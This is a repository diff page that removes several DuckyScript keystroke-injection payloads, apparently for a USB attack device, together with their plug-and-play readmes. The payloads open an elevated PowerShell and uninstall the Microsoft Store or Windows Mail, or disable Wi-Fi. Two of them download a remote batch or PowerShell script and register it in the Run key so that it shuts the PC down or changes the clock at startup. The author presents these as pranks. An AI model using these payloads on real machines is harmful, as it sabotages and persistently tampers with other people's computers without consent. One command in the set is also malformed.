🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    MoreSeriousFUN/DeleteMicrosoftStore/DeleteMicrosoftStore.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Deletes the Microsoft Store
    3  -REM Version: 1.0
    4  -REM Category: Fun
    5  -DELAY 500
    6  -GUI r
    7  -DELAY 300
    8  -REM Start PowerShell as Admin
    9  -STRING powershell Start-Process powershell -Verb runAs
    10  -DELAY 300
    11  -ENTER
    12  -DELAY 500
    13  -LEFTARROW
    14  -DELAY 450
    15  -ENTER
    16  -DELAY 600
    17  -REM Deletes Microsoft Store
    18  -STRING Get-AppxPackage *windowsstore*|Remove-AppxPackage
    19  -DELAY 200
    20  -ENTER
    21  -
    22  -
    23  - 
  • ■ ■ ■ ■ ■ ■
    MoreSeriousFUN/DeleteMicrosoftStore/readme.md
    1  -
    2  -# DeleteMicrosoftStore
    3  -This script will delete the Microsoft Store.
    4  -
    5  -## How to use?
    6  -
    7  -This script is plug and play.
    8  -
    9  -
    10  -## Features
    11  -
    12  -- open powershell
    13  -- remove MS store package
    14  -
    15  -
    16  -## Feedback
    17  -
    18  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    19  -
    20  -
    21  -
    22  -
    23  -
    24  -
    25  -## Support
    26  -
    27  -For support, contact me via Discord "UNC0V3R3D#8662".
    28  -
    29  -
    30  -## Meta
    31  -
    32  -
    33  -- If you want to sponsor me on Patreon, the link is on my profile.
    34  -
    35  -
    36  - 
  • ■ ■ ■ ■ ■ ■
    MoreSeriousFUN/DeleteWindowsMail/DeleteWindowsMail.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Deletes the Windows Mail app.
    3  -REM Version: 1.0
    4  -REM Category: Fun
    5  -DELAY 500
    6  -GUI r
    7  -DELAY 300
    8  -REM Start PowerShell as Admin
    9  -STRING powershell Start-Process powershell -Verb runAs
    10  -DELAY 300
    11  -ENTER
    12  -DELAY 500
    13  -LEFTARROW
    14  -DELAY 450
    15  -ENTER
    16  -DELAY 600
    17  -REM Deletes Windows Mail app
    18  -STRING AppxPackage Microsoft.windowscommunicationsapps | Remove-AppxPackage
    19  -DELAY 200
    20  -ENTER
  • ■ ■ ■ ■ ■ ■
    MoreSeriousFUN/DeleteWindowsMail/readme.md
    1  -
    2  -# DeleteWindowsMail
    3  -This script will delete the Windows Mail.
    4  -
    5  -## How to use?
    6  -
    7  -This script is plug and play.
    8  -
    9  -
    10  -## Features
    11  -
    12  -- open powershell
    13  -- remove windows mail package
    14  -
    15  -
    16  -## Feedback
    17  -
    18  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    19  -
    20  -
    21  -
    22  -
    23  -
    24  -
    25  -## Support
    26  -
    27  -For support, contact me via Discord "UNC0V3R3D#8662".
    28  -
    29  -
    30  -## Meta
    31  -
    32  -
    33  -- If you want to sponsor me on Patreon, the link is on my profile.
    34  -
    35  -
    36  - 
  • ■ ■ ■ ■ ■ ■
    MoreSeriousFUN/NoMoreWifi/NoMoreWifi.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: No more wifi until you turn it back on with ipconfig /renew
    3  -REM Version: 1.0
    4  -REM Category: FUN
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 1500
    8  -WINDOWS r
    9  -DELAY 1500
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 560
    13  -LEFTARROW
    14  -DELAY 500
    15  -ENTER
    16  -DELAY 700
    17  -STRING Disable-NetAdapter (Get-NetAdapter | Where-Object {$_.Name -like "*Wi-Fi*"})
    18  -DELAY 300
    19  -ENTER
    20  - 
  • ■ ■ ■ ■ ■ ■
    MoreSeriousFUN/NoMoreWifi/readme.md
    1  -
    2  -# NoMoreWifi
    3  -This script will turn off the wifi until you turn it back on with ipconfig /renew
    4  -
    5  -## How to use?
    6  -
    7  -This script is plug and play.
    8  -
    9  -
    10  -## Features
    11  -
    12  -- open powershell
    13  -- disable network adapter
    14  -
    15  -
    16  -## Feedback
    17  -
    18  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    19  -
    20  -
    21  -
    22  -
    23  -
    24  -
    25  -## Support
    26  -
    27  -For support, contact me via Discord "UNC0V3R3D#8662".
    28  -
    29  -
    30  -## Meta
    31  -
    32  -
    33  -- If you want to sponsor me on Patreon, the link is on my profile.
    34  -
    35  -
    36  - 
  • ■ ■ ■ ■ ■ ■
    MoreSeriousFUN/OnStartupChangeDateAndTime/OnStartupChangeDateAndTime.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Creates a PowerShell script that will run on startup and change date and time after 10 minutes
    3  -REM Version: 1.0
    4  -REM Category: Serious-FUN
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 950
    8  -WINDOWS r
    9  -DELAY 650
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 850
    16  -ALT y
    17  -DELAY 1200
    18  -STRING $url = "https://github.com/UNC0V3R3D/ressources/blob/main/date.ps1"; $output = "C:\windows\date.ps1"; Invoke-WebRequest -Uri $url -OutFile $output;
    19  -DELAY 400
    20  -ENTER
    21  -DELAY 600
    22  -STRING New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" ` -Name "date" ` -Value "C:\windows\date.ps1"
    23  -DELAY 400
    24  -ENTER
    25  -exit
  • ■ ■ ■ ■ ■ ■
    MoreSeriousFUN/OnStartupChangeDateAndTime/readme.md
    1  -
    2  -# OnStartupChangeDateAndTime
    3  -Creates a PowerShell script that will run on startup and change date and time after 10 minutes
    4  -
    5  -## How to use?
    6  -
    7  -This script is plug and play.
    8  -
    9  -
    10  -## Features
    11  -
    12  -- open powershell
    13  -- change date and time
    14  -
    15  -## Feedback
    16  -
    17  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    18  -
    19  -
    20  -
    21  -
    22  -
    23  -
    24  -## Support
    25  -
    26  -For support, contact me via Discord "UNC0V3R3D#8662".
    27  -
    28  -
    29  -## Meta
    30  -
    31  -
    32  -- If you want to sponsor me on Patreon, the link is on my profile.
    33  -
    34  -
    35  - 
  • ■ ■ ■ ■ ■ ■
    MoreSeriousFUN/ShutDownFun/ShutDownFun.txt
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Creates a batch file that will run on startup and shutdown the pc after 10 minutes
    3  -REM Version: 1.0
    4  -REM Category: Serious-FUN
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 950
    8  -WINDOWS r
    9  -DELAY 650
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 850
    16  -ALT y
    17  -DELAY 1200
    18  -STRING $url = "https://github.com/UNC0V3R3D/ressources/blob/main/shutdown.bat"; $output = "C:\windows\927356239523.bat"; Invoke-WebRequest -Uri $url -OutFile $output;
    19  -DELAY 400
    20  -ENTER
    21  -DELAY 600
    22  -STRING New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" ` -Name "927356239523" ` -Value "C:\windows\927356239523.bat"
    23  -DELAY 400
    24  -ENTER
    25  -exit
  • ■ ■ ■ ■ ■ ■
    MoreSeriousFUN/ShutDownFun/readme.md
    1  -
    2  -# ShutDownFun
    3  -Creates a batch file that will run on startup and shutdown the pc after 10 minutes
    4  -
    5  -## How to use?
    6  -
    7  -This script is plug and play.
    8  -
    9  -
    10  -## Features
    11  -
    12  -- open powershell
    13  -- download batch file
    14  -- put batch file into startup folder
    15  -
    16  -## Feedback
    17  -
    18  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    19  -
    20  -
    21  -
    22  -
    23  -
    24  -
    25  -## Support
    26  -
    27  -For support, contact me via Discord "UNC0V3R3D#8662".
    28  -
    29  -
    30  -## Meta
    31  -
    32  -
    33  -- If you want to sponsor me on Patreon, the link is on my profile.
    34  -
    35  -
    36  - 
Please wait...
Page is in error, reload to recover